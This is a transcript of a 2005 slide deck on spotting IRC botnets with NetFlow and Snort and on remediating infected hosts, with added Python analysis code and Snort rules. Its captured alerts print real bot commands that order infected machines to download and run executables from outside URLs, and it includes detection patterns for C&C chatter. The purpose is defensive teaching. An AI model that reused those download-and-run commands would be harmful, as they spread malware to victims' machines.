Spot the Bot

Apr 07, 2018


Vishal Mishra
Transcript
  • 8/6/2019 Spot the Bot

    1/36

    Spot the Bot:

    IRC Bot Detection and

    Remediation

    Karl F. Lutzen

    Systems Security Analyst, UMR Information Systems Security


    Agenda

    Bot Basics

    Detection Methods

    Remediation

    Risk Mitigation

    Summary


    Bots/Zombies/Drones

    Call them anything you want, but they all describe the same thing: trouble.

    Botnets today are run for fun, with malicious intent, and for profit.


    Dutch Botnet Bigger Than Expected

    http://www.governmententerprise.com/news/172303265

    October 21, 2005

    Dutch prosecutors who last month arrested a trio of young men for creating a large botnet allegedly used to extort a U.S. company, steal identities, and distribute spyware now say they bagged bigger prey: a botnet of 1.5 million machines.

    The three suspects, ages 19, 22, and 27, were arrested Oct. 6 on charges of threatening a U.S. firm with a denial-of-service (DoS) attack after Amsterdam-based Internet service provider XS4ALL notified authorities of unusual activity on its network.


    Bots and Botnets - 1

    A Bot is a remote control program loaded onto unsuspecting hosts for various purposes, usually malicious.

    The Bot owner has full control of what he/she wishes to upload onto the compromised system and what it can do.

    A group of Bots under a single owner (bot herder) is a Botnet (bot herd).


    Bots and Botnets - 2

    Bots are spread as malicious payloads using any number of attack vectors:

    Worms
    Email viruses
    Phishing
    Infected files on file shares/P2P
    Direct attack of vulnerabilities
    Enticement via Web/Instant Messages ("This is cool! Click me")


    Bots and Botnets - 3

    Bots are usually controlled via IRC by blackhats/interested parties of all ages.

    The Botnet owner simply sends commands to the IRC channel and the Bots do what they are told.

    This circumvents firewalls and network address translators: the infected host initiates the connection out to the control server, so a stateful firewall or NAT device that permits outbound connections lets the command channel straight through.


    Bots and Botnets - 4

    Botnets can steal: personal or business information, software license keys, etc.

    Botnets can launch any number of attacks: DoS, DDoS, send spam, launch worms, spread pop-up ads.

    Anything the Bot owner chooses to do, the botted systems will dutifully carry out.


    Bot Fighting on Slashdot

    Microsoft's Vigilante Investigation of Zombies

    Posted by Zonk on Friday October 28, @03:55PM from the busting-undead-skull dept.

    Morgalyn writes "According to an article at InformationWeek, Microsoft has decided to fight zombie-launched spam in their own way. In conjunction with the FTC and consumer rights groups, Microsoft set up a clean computer and then infected it. They monitored the 'zombie' over the course of 20 days - 'In those 20 days, this one computer received 5 million connection requests from spammers, and sent 18 million spam messages'. This whole operation has led to the (partial) identification of 13 different spamming groups, some of which reside in the US and may be prosecuted under the CAN-SPAM act."


    Bot Detection Setup

    Policies first! Have your monitoring and acceptable-use policies in place before you start capturing payloads.

    Install network statistics monitoring:

    NetFlow
    sFlow
    Firewall with logging
    Others

    IDS sensors such as Snort


    Network Statistics

    Determine unusual traffic patterns
    Find out all systems talking to a specific host
    Verify whether firewall rules are working or not

    Downside:

    Hard to read
    Generates a huge amount of data
    Only reactive
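    The two uses of flow data named on this slide (list every system talking to a given host; spot an unusual pattern, here several campus hosts holding TCP sessions to one outside server on an odd port) as an added Python example. This is not part of the slides or of any NetFlow/sFlow tool: the flow records are constructed in a simplified CSV layout rather than nfdump or sflowtool output, 131.151.0.0/16 is assumed as the campus range because the alerts later in the deck come from 131.151.x.y, and the "expected ports" list and the three-host threshold are arbitrary starting points to tune against your own traffic.

```python
import csv
import io
from collections import defaultdict
from ipaddress import ip_address, ip_network

HOME_NET = ip_network("131.151.0.0/16")   # assumed campus range (taken from the alerts)
# Ports where many internal hosts talking to one external server is normal.
EXPECTED_PORTS = {25, 53, 80, 123, 443}

# Constructed flow export in a simplified CSV layout (not nfdump's real output).
SAMPLE_FLOWS = """\
ts,proto,src,sport,dst,dport,packets,bytes
2005-10-25T00:00:27,tcp,131.151.10.11,4321,69.64.51.161,1231,412,26900
2005-10-25T00:00:31,tcp,131.151.10.12,1045,69.64.51.161,1231,398,25100
2005-10-25T00:01:02,tcp,131.151.10.23,2201,69.64.51.161,1231,377,24600
2005-10-25T00:01:40,tcp,131.151.10.30,1350,69.64.51.161,1231,405,26300
2005-10-25T00:02:00,tcp,131.151.10.40,2993,220.85.13.93,4367,120,8100
2005-10-25T00:02:05,tcp,131.151.10.11,1051,93.184.216.34,443,60,54000
2005-10-25T00:02:06,tcp,131.151.10.12,1060,93.184.216.34,443,58,52000
2005-10-25T00:02:07,tcp,131.151.10.50,1070,93.184.216.34,443,61,55000
2005-10-25T00:02:08,tcp,131.151.10.60,1080,93.184.216.34,443,59,53000
2005-10-25T00:02:09,udp,131.151.10.11,1100,8.8.8.8,53,2,300
2005-10-25T00:02:10,udp,131.151.10.12,1101,8.8.8.8,53,2,310
2005-10-25T00:02:11,udp,131.151.10.23,1102,8.8.8.8,53,2,290
2005-10-25T00:02:12,tcp,69.64.51.161,1231,131.151.10.11,4321,400,31000
"""


def parse_flows(text):
    """Load flow rows, turning addresses and counters into proper types."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["src"], row["dst"] = ip_address(row["src"]), ip_address(row["dst"])
        for key in ("sport", "dport", "packets", "bytes"):
            row[key] = int(row[key])
        rows.append(row)
    return rows


def talkers_to(flows, host):
    """All internal hosts that exchanged traffic with `host`, in either direction."""
    host = ip_address(host)
    inside = set()
    for f in flows:
        if f["dst"] == host and f["src"] in HOME_NET:
            inside.add(f["src"])
        elif f["src"] == host and f["dst"] in HOME_NET:
            inside.add(f["dst"])
    return [str(ip) for ip in sorted(inside)]


def rendezvous_points(flows, min_hosts=3):
    """External (server, port) pairs that at least `min_hosts` internal hosts hold
    TCP sessions to, on a port where that is not normal: the shape of a botnet
    C&C channel. Bytes per packet is reported because C&C chatter is small."""
    clients, packets, octets = defaultdict(set), defaultdict(int), defaultdict(int)
    for f in flows:
        if f["proto"] != "tcp" or f["src"] not in HOME_NET or f["dst"] in HOME_NET:
            continue                                  # outbound campus TCP only
        key = (f["dst"], f["dport"])
        clients[key].add(f["src"])
        packets[key] += f["packets"]
        octets[key] += f["bytes"]
    hits = []
    for (dst, dport), hosts in clients.items():
        if len(hosts) >= min_hosts and dport not in EXPECTED_PORTS:
            hits.append({"server": str(dst), "port": dport,
                         "hosts": [str(ip) for ip in sorted(hosts)],
                         "bytes_per_packet": round(octets[(dst, dport)] / packets[(dst, dport)], 1)})
    return sorted(hits, key=lambda h: -len(h["hosts"]))


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    for hit in rendezvous_points(flows):
        print(f"{hit['server']}:{hit['port']} <- {len(hit['hosts'])} internal hosts, "
              f"{hit['bytes_per_packet']} bytes/packet")
    print("talking to 69.64.51.161:", talkers_to(flows, "69.64.51.161"))
```

    On the sample data only 69.64.51.161:1231 is reported: the four hosts to 93.184.216.34:443 are on an expected port, the DNS flows are UDP, and the single host to 220.85.13.93:4367 is under the threshold (lower `min_hosts` to see it). This is the "group of infected hosts talking to a single server" pattern the deck asks you to report; the flow data tells you which hosts to look at, and the IDS payloads tell you what they are saying.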


    IDS with Snort

    Open source software; runs on Linux, Windows and OS X
    Thousands of detection rules available
    Can be coupled with iptables for instant quarantine
    Database alert management
    Graphic consoles available
    Should be located at your egress point(s)

    http://www.snort.org/


    Rule Sets

    Select only a specific group of bot rules. Also get the Bleeding Edge Snort rules:

    http://www.bleeding-snort.org/

    (The Bleeding Edge rule project has since been succeeded by Emerging Threats.)

    Don't get carried away! Loading every rule you can find buries the bot alerts in noise and costs sensor performance.


    Rules To Choose

    Get the rules that detect IRC commands on both standard and non-standard IRC ports:

    NICK
    JOIN
    PRIVMSG

    Use both the standard Snort and Bleeding Edge Snort rules that cover these commands. UMR does not use any custom rules to detect bots, as these basic rules really do the job.
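    Two rules in the style this slide recommends, added here as an example (they are not the Bleeding Edge or UMR rule text; $HOME_NET, $EXTERNAL_NET and the sid values are placeholders for a local deployment). The first fires on a client NICK command sent to any TCP port outside the usual IRC range, which is the shape of the "Nick change on non-std port" alerts shown later in the deck; its tag option makes Snort log the next packets of the same session as well, so the USER, JOIN and PRIVMSG lines that follow the NICK end up in the log too. The second catches a JOIN that supplies a channel key, on any port.

```snort
# Added example rules in the style of the Bleeding Edge IRC signatures; not the
# Bleeding Edge or UMR rule text. $HOME_NET, $EXTERNAL_NET and the sids are
# placeholders for your own deployment.
alert tcp $HOME_NET any -> $EXTERNAL_NET !6660:7000 (msg:"LOCAL IRC NICK on non-std port"; flow:to_server,established; content:"NICK "; depth:5; nocase; tag:session,30,packets; classtype:trojan-activity; sid:1000001; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL IRC JOIN with channel key"; flow:to_server,established; content:"JOIN "; depth:5; nocase; pcre:"/^JOIN[ \t]+[#&][^\s,]+(,[#&][^\s,]+)*[ \t]+\S/i"; classtype:trojan-activity; sid:1000002; rev:1;)
```

    The port exclusion in the first rule means it never sees IRC on the standard ports; keep the stock IRC rules for those. A non-standard port by itself is a weak signal (legitimate clients can sit on 8080 as easily as a bot's server can), so treat the alert as a lead to be confirmed by what the nick, channel and PRIVMSG content look like.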


    Spot the Bot - Unusual Names

    NICK or USER names seen from bots:

    USA|08039035
    x445004
    XP-7546411
    [o]619531707
    [urx]47517
    wxkrihazqydm
    [worm3]8454428
    [XkzQ]-31244

    The key here is that nicknames must be unique on an IRC network, so bots generate random names (typically a fixed tag plus a random number, or a random string of letters) to avoid collisions.


    Unusual Name Sample 1

    #(6 - 1326751) [2005-02-15 15:52:34] [snort/3856] BLEEDING-EDGE IRC - Nick change on non-std port
    IPv4: 131.151.xxx.yyy -> 69.31.76.179
    hlen=5 TOS=32 dlen=58 ID=30 flags=0 offset=0 TTL=128 chksum=23670
    TCP: port=1032 -> dport: 3994 flags=***AP*** seq=3157605320 ack=2395385288 off=5 res=0 win=8704 urp=0 chksum=11320
    Payload: length = 18
    000 : 4E 49 43 4B 20 5B 58 6B 7A 51 5D 2D 33 31 32 34 NICK [XkzQ]-3124
    010 : 34 0A                                           4.


    Unusual Name Sample 2

    #(6 - 1885480) [2005-03-06 17:51:24] [snort/2000345] BLEEDING-EDGE IRC - Nick change on non-std port
    IPv4: 131.151.xxx.yyy -> 134.36.198.28
    hlen=5 TOS=32 dlen=96 ID=36715 flags=0 offset=0 TTL=128 chksum=5416
    TCP: port=3938 -> dport: 8080 flags=***AP*** seq=4008201724 ack=92744897 off=5 res=0 win=64240 urp=0 chksum=2747
    Payload: length = 56
    000 : 4E 49 43 4B 20 5B 77 6F 72 6D 33 5D 38 34 35 34 NICK [worm3]8454
    010 : 34 32 38 0D 0A 55 53 45 52 20 75 78 71 69 6B 74 428..USER uxqikt
    020 : 6D 66 20 30 20 30 20 3A 5B 77 6F 72 6D 33 5D 38 mf 0 0 :[worm3]8
    030 : 34 35 34 34 32 38 0D 0A                         454428..


    Spot the Bot - Channel names

    Look for odd JOIN commands (where a second word is present, it is the channel key):

    #ev1ls x
    #worm3
    #M0b3l1
    #a,#b,#c
    #port1 llck
    #x# lmao
    #.a
    #.dr0nz

    Channel names are a little tricky, as normal names can be very similar. Recommend using IRC yourself to get a baseline of what legitimate channel names and JOIN traffic look like on your network.


    Channel Names

    #(14 - 1584355) [2005-10-25 00:00:34] [snort/2000348] BLEEDING-EDGE ATTACK RESPONSE IRC - Channel JOIN on non-std port
    IPv4: 131.151.xxx.yyy -> 69.64.51.161
    hlen=5 TOS=0 dlen=54 ID=28371 flags=0 offset=0 TTL=128 chksum=55367
    TCP: port=4321 -> dport: 1231 flags=***AP*** seq=2096338814 ack=2490835872 off=5 res=0 win=17116 urp=0 chksum=49459
    Payload: length = 14
    000 : 4A 4F 49 4E 20 23 45 76 31 6C 73 20 78 0A       JOIN #Ev1ls x.


    Channel Names

    #(6 - 5795325) [2005-05-12 00:41:08] [snort/2000348] BLEEDING-EDGE IRC - Channel JOIN on non-std port
    IPv4: 131.151.xxx.yyy -> 220.85.13.93
    hlen=5 TOS=0 dlen=55 ID=17572 flags=0 offset=0 TTL=127 chksum=47920
    TCP: port=2993 -> dport: 4367 flags=***AP*** seq=1143137794 ack=1716133218 off=5 res=0 win=17392 urp=0 chksum=29328
    Payload: length = 15
    000 : 4A 4F 49 4E 20 23 78 23 20 6C 6D 61 6F 0D 0A    JOIN #x# lmao..


    Spot the Bot - PRIVMSG

    PRIVMSG traffic carries the bot's orders and reports:

    Download instructions
    Scanning instructions
    Exploited host information
    Personal information (license keys)

    Warning: private messages contain private conversations, downloads, etc. Use with extreme caution.


    Spot the Bot - PRIVMSG

    #(6 - 1885569) [2005-03-06 17:52:35] [snort/2000347] BLEEDING-EDGE IRC - Private message on non-std port
    IPv4: 131.151.xxx.yyy -> 193.10.218.172
    hlen=5 TOS=32 dlen=156 ID=35717 flags=0 offset=0 TTL=128 chksum=51933
    TCP: port=2123 -> dport: 8080 flags=***AP*** seq=1876389772 ack=2284567773 off=5 res=0 win=64885 urp=0 chksum=48995
    Payload: length = 116
    000 : 50 52 49 56 4D 53 47 20 23 6C 6C 20 3A 5B 44 4F PRIVMSG #ll :[DO
    010 : 57 4E 4C 4F 41 44 5D 3A 20 44 6F 77 6E 6C 6F 61 WNLOAD]: Downloa
    020 : 64 69 6E 67 20 55 52 4C 3A 20 68 74 74 70 3A 2F ding URL: http:/
    030 : 2F 77 77 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 /www.angelfire.c
    040 : 6F 6D 2F 77 61 33 2F 6C 6F 6C 61 2F 6D 77 2E 72 om/wa3/lola/mw.r
    050 : 61 72 20 74 6F 3A 20 63 3A 5C 77 69 6E 64 6F 77 ar to: c:\window
    060 : 73 5C 73 79 73 74 65 6D 33 32 5C 70 6B 2E 65 78 s\system32\pk.ex
    070 : 65 2E 0D 0A                                     e...


    PRIVMSG Scan Report

    #(6 - 4695420) [2005-05-01 15:52:18] [snort/1] Tagged Packet
    IPv4: 131.151.xxx.yyy -> 205.244.47.221
    hlen=5 TOS=0 dlen=168 ID=64 flags=0 offset=0 TTL=128 chksum=50198
    TCP: port=1032 -> dport: 57383 flags=***AP*** seq=631391448 ack=2791198005 off=5 res=0 win=17073 urp=0 chksum=29858
    Payload: length = 128
    000 : 50 52 49 56 4D 53 47 20 23 6F 20 3A 5B 53 43 41 PRIVMSG #o :[SCA
    010 : 4E 5D 3A 20 53 65 71 75 65 6E 74 69 61 6C 20 50 N]: Sequential P
    020 : 6F 72 74 20 53 63 61 6E 20 73 74 61 72 74 65 64 ort Scan started
    030 : 20 6F 6E 20 31 33 31 2E 31 35 31 2E 30 2E 30 3A  on 131.151.0.0:
    040 : 31 33 39 20 77 69 74 68 20 61 20 64 65 6C 61 79 139 with a delay
    050 : 20 6F 66 20 34 20 73 65 63 6F 6E 64 73 20 66 6F  of 4 seconds fo
    060 : 72 20 30 20 6D 69 6E 75 74 65 73 20 75 73 69 6E r 0 minutes usin
    070 : 67 20 32 30 30 20 74 68 72 65 61 64 73 2E 0D 0A g 200 threads...


    Tagged Packets

    Some Snort rules include a tag option; when such a rule fires, Snort also logs the packets that follow from the same session (or host) for a set number of packets or seconds. These are the Tagged Packets. They do not themselves match the rule's detection content, but they contain significant information, such as the rest of the IRC exchange. Turning them off is possible, but they are very useful.


    User MODE: Invisible

    #(14 - 1584280) [2005-10-25 00:00:27] [snort/1] Tagged Packet
    IPv4: 131.151.xxx.yyy -> 69.64.51.161
    hlen=5 TOS=0 dlen=83 ID=27977 flags=0 offset=0 TTL=128 chksum=55732
    TCP: port=4321 -> dport: 1231 flags=***AP*** seq=2096338771 ack=2490835835 off=5 res=0 win=17153 urp=0 chksum=39888
    Payload: length = 43
    000 : 4D 4F 44 45 20 5B 58 50 2D 37 35 34 36 34 31 31 MODE [XP-7546411
    010 : 5D 20 2B 69 78 0A 4D 4F 44 45 20 5B 58 50 2D 37 ] +ix.MODE [XP-7
    020 : 35 34 36 34 31 31 5D 20 2B 69 0A                546411] +i.


    Tagged Packet - Other Data

    #(6 - 4404904) [2005-09-27 08:15:52] [snort/1] Tagged Packet
    IPv4: 69.50.230.207 -> 131.151.xxx.yyy
    hlen=5 TOS=0 dlen=133 ID=6397 flags=0 offset=0 TTL=46 chksum=63130
    TCP: port=8080 -> dport: 1142 flags=***AP*** seq=536906448 ack=4216320730 off=5 res=0 win=6432 urp=0 chksum=61441
    Payload: length = 93
    000 : 3A 71 21 66 64 67 64 66 67 40 68 65 6C 6C 6F 2E :q!fdgdfg@hello.
    010 : 6E 65 74 20 54 4F 50 49 43 20 23 77 6F 6F 74 20 net TOPIC #woot 
    020 : 3A 2E 64 6C 20 68 74 74 70 3A 2F 2F 68 6F 6D 65 :.dl http://home
    030 : 70 61 67 65 2E 6E 74 6C 77 6F 72 6C 64 2E 63 6F page.ntlworld.co
    040 : 6D 2F 74 72 61 63 65 79 33 32 2F 61 2E 65 78 65 m/tracey32/a.exe
    050 : 20 61 2E 65 78 65 20 31 20 2D 73 0D 0A           a.exe 1 -s..


    Tagged Packet - Other Data

    #(6 - 5795327) [2005-05-12 00:41:08] [snort/1] Tagged Packet
    IPv4: 220.85.13.93 -> 131.151.xxx.yyy
    hlen=5 TOS=0 dlen=253 ID=21842 flags=0 offset=0 TTL=44 chksum=64700
    TCP: port=4367 -> dport: 2993 flags=***AP*** seq=1716133218 ack=1143137809 off=5 res=0 win=5749 urp=0 chksum=22567
    Payload: length = 213
    000 : 3A 73 64 79 79 78 63 6B 67 64 66 6D 21 7E 73 64 :sdyyxckgdfm!~sd
    010 : 79 79 78 63 6B 67 64 40 31 33 31 2E 31 35 31 2E yyxckgd@131.151.
    020 : xx xx xx 2E xx xx xx 20 4A 4F 49 4E 20 3A 23 78 xxx.yyy JOIN :#x
    030 : 23 0D 0A 3A 53 53 48 20 33 33 32 20 73 64 79 79 #..:SSH 332 sdyy
    040 : 78 63 6B 67 64 66 6D 20 23 78 23 20 3A 2E 61 69 xckgdfm #x# :.ai
    050 : 6D 73 70 72 65 61 64 20 68 74 74 70 3A 2F 2F 76 mspread http://v
    060 : 6F 69 70 73 74 6F 72 65 2E 6E 65 74 2F 6D 79 70 oipstore.net/myp
    070 : 69 63 2E 63 6F 6D 0D 0A 3A 53 53 48 20 33 33 33 ic.com..:SSH 333
    080 : 20 73 64 79 79 78 63 6B 67 64 66 6D 20 23 78 23  sdyyxckgdfm #x#
    090 : 20 31 30 3A 33 30 20 50 4D 20 31 31 31 35 38 37  10:30 PM 111587
    0a0 : 39 36 38 35 0D 0A 3A 53 53 48 20 33 36 36 20 73 9685..:SSH 366 s
    0b0 : 64 79 79 78 63 6B 67 64 66 6D 20 23 78 23 20 3A dyyxckgdfm #x# :
    0c0 : 45 6E 64 20 6F 66 20 2F 4E 41 4D 45 53 20 6C 69 End of /NAMES li
    0d0 : 73 74 2E 0D 0A                                  st...
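    The indicators walked through on the preceding slides (random-looking NICK/USER names, odd or keyed JOINs, PRIVMSG/TOPIC bodies carrying download or scan instructions, MODE +i, and all of it on a non-standard port), applied by a script to the alert text in the format shown above, as an added Python example. This is not part of the slides and not Snort's or BASE's own logic: the hex-dump parser is written against the "000 : 4E 49 ..." layout of the dumps above, the scoring rules and their thresholds are heuristics of mine to be tuned against a baseline of your own IRC traffic, and the sample alert text is constructed (the payload bytes are the ones from the slide 18 sample). Python 3.8 or later is assumed for the walrus operator.

```python
import re

IRC_STD_PORTS = set(range(6660, 6670)) | {6697, 7000}   # anything else is "non-std"

HEX_ROW = re.compile(r"^\s*[0-9A-Fa-f]{3,}\s*:\s*(.*)$")        # "000 : 4E 49 43 4B ..."
PORT_LINE = re.compile(r"port=(\d+)\s*->\s*dport:\s*(\d+)")
LEN_LINE = re.compile(r"Payload:\s*length\s*=\s*(\d+)")
# Nick shapes seen on the slides: "[XkzQ]-31244", "USA|08039035", "x445004", "XP-7546411".
TAGGED_NUMERIC = re.compile(r"^(?:\[[^\]]+\]|[A-Za-z]{1,3})[|\-]?\d{5,}$")
LEET = re.compile(r"[a-z][0-9][a-z]", re.I)                       # "ev1ls", "M0b3l1"
BOT_CHATTER = re.compile(
    r"\[(?:DOWNLOAD|SCAN)\]|\.(?:dl|aimspread)\b|\.(?:exe|rar)\b|port scan", re.I)


def payload_bytes(alert_text):
    """Rebuild the raw payload from the hex column of a BASE-style alert dump."""
    cap, out = None, bytearray()
    for raw in alert_text.splitlines():
        if m := LEN_LINE.search(raw):
            cap = int(m.group(1))             # "Payload: length = N" bounds the result
        elif m := HEX_ROW.match(raw):
            row = bytearray()
            for tok in m.group(1).split():
                # at most 16 bytes per row; the first non-hex token starts the ASCII column
                if len(row) == 16 or not re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
                    break
                row.append(int(tok, 16))
            out += row
    return bytes(out if cap is None else out[:cap])


def parse_irc_line(line):
    """Split ':prefix CMD p1 p2 :trailing' into (prefix, CMD, [params]); None if empty."""
    prefix, trailing = None, None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if not parts:
        return None
    return prefix, parts[0].upper(), parts[1:] + ([trailing] if trailing is not None else [])


def looks_random(name):
    """Bot-style NICK/USER value: a tag plus a long number, or 8+ letters with almost
    no vowels ("wxkrihazqydm"). Heuristic thresholds; tune against your own baseline."""
    if TAGGED_NUMERIC.match(name):
        return True
    letters = re.sub(r"[^A-Za-z]", "", name)
    return len(letters) >= 8 and sum(c in "aeiouAEIOU" for c in letters) / len(letters) < 0.2


def odd_channel(chan):
    """Very short, dot-prefixed or leet-spelled channel names: "#x#", "#.dr0nz", "#ev1ls"."""
    name = chan.lstrip("#&")
    return len(name) <= 2 or name.startswith(".") or bool(LEET.search(name))


def score_line(cmd, params):
    """Reasons one IRC line looks like bot traffic (empty list means nothing odd)."""
    reasons = []
    if cmd == "NICK" and params and looks_random(params[0]):
        reasons.append(f"random-looking nick {params[0]!r}")
    elif cmd == "USER":                                            # username, realname
        reasons += [f"random-looking USER field {f!r}" for f in params[0:1] + params[3:4]
                    if looks_random(f)]
    elif cmd == "JOIN" and params:
        reasons += [f"odd channel {c!r}" for c in params[0].split(",") if odd_channel(c)]
        if len(params) > 1:
            reasons.append("join with a channel key")
    elif cmd in ("PRIVMSG", "TOPIC") and params:
        if m := BOT_CHATTER.search(params[-1]):
            reasons.append(f"bot chatter {m.group(0)!r}")
    elif cmd == "MODE" and len(params) > 1 and "+i" in params[1]:
        reasons.append("user mode +i (invisible)")
    return reasons


def analyze_alert(alert_text):
    """[(command, [reasons])] for one alert text; the 'PORT' entry is the port check."""
    findings = []
    if (m := PORT_LINE.search(alert_text)) and int(m.group(2)) not in IRC_STD_PORTS:
        findings.append(("PORT", [f"IRC to non-standard port {m.group(2)}"]))
    for raw in re.split(r"\r?\n", payload_bytes(alert_text).decode("latin-1")):
        if parsed := parse_irc_line(raw.strip()):
            _, cmd, params = parsed
            if reasons := score_line(cmd, params):
                findings.append((cmd, reasons))
    return findings


# Constructed alert text in the slides' format; the payload is the slide 18 sample.
SAMPLE_ALERT = """\
TCP: port=3938 -> dport: 8080 flags=***AP***
Payload: length = 56
000 : 4E 49 43 4B 20 5B 77 6F 72 6D 33 5D 38 34 35 34 NICK [worm3]8454
010 : 34 32 38 0D 0A 55 53 45 52 20 75 78 71 69 6B 74 428..USER uxqikt
020 : 6D 66 20 30 20 30 20 3A 5B 77 6F 72 6D 33 5D 38 mf 0 0 :[worm3]8
030 : 34 35 34 34 32 38 0D 0A                         454428..
"""
```

    `analyze_alert(SAMPLE_ALERT)` reports the non-standard port, the nick `[worm3]8454428` and the same string reused as the USER realname. The parser stops at the first token on a row that is not a two-digit hex byte, and additionally trusts the `Payload: length` line, so an ASCII column that happens to start with hex-looking text cannot add bytes. Server-side lines such as the `TOPIC` in the tagged packet above go through `parse_irc_line` the same way, with the `:nick!user@host` prefix split off first.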


    That's All There Is To It!

    You now have the basics to detect IRC-controlled bots.

    If you discover a group of infected hosts talking to a single server, be sure to report it to:

    [email protected]

    Sharing information is the best way to combat bots.


    Feds Bust Suspected Bot Master

    Federal authorities arrested a 20-year-old California man on Thursday, accusing him of creating bot software to compromise nearly 400,000 Windows computers and using his control of the systems to garner more than $60,000 in profits.

    Over nearly a year, Ancheta allegedly used automated software to infect Windows systems, advertised and sold access to the compromised PCs, and used the software to perpetrate click fraud, garnering tens of thousands of dollars in affiliate fees, according to a 58-page indictment released on Thursday.

    Security Focus, Nov 4, 2005

    http://enterprisesecurity.symantec.com/content.cfm?articleid=6156


    Remediation

    Generally you will end up with an Administrator/SYSTEM level compromise.

    Can be cleaned, but no guarantees: it is rare to return to a trusted state.

    Possible rootkits (the www.sysinternals.com tools are great for finding them).

    Hidden files. The entire Internet is the domain for other installs: the bot owner can download and run anything, so you cannot enumerate what else was put on the box.

    Best Practice: Flatten/Rebuild.


    Risk Mitigation

    Educate your users. Repeatedly.
    Web browser security settings
    Do not run as Admin
    Install anti-virus software with auto updates
    Keep systems patched
    DON'T CLICK THAT LINK!
    Block ports not needed for business
    Proxy servers
    Install network statistics monitoring like NetFlow
    Install IDS sensors like Snort


    Other Issues with Bots

    Encryption
    Modified IRC servers
    Morphing tendencies:
      Commands change
      Exploits change / adapt to new vulnerabilities
    Moving targets:
      IRC servers change
      Ports change


    Summary

    Bots will be with us for a very long time. Best practices:

    Educate users: patches/security settings/what not to do!
    Install IDS and network statistics monitoring
    Keep yourself up to date on the bots and their tactics
    Share your findings. Inform MOREnet: [email protected]

    Further questions: [email protected]
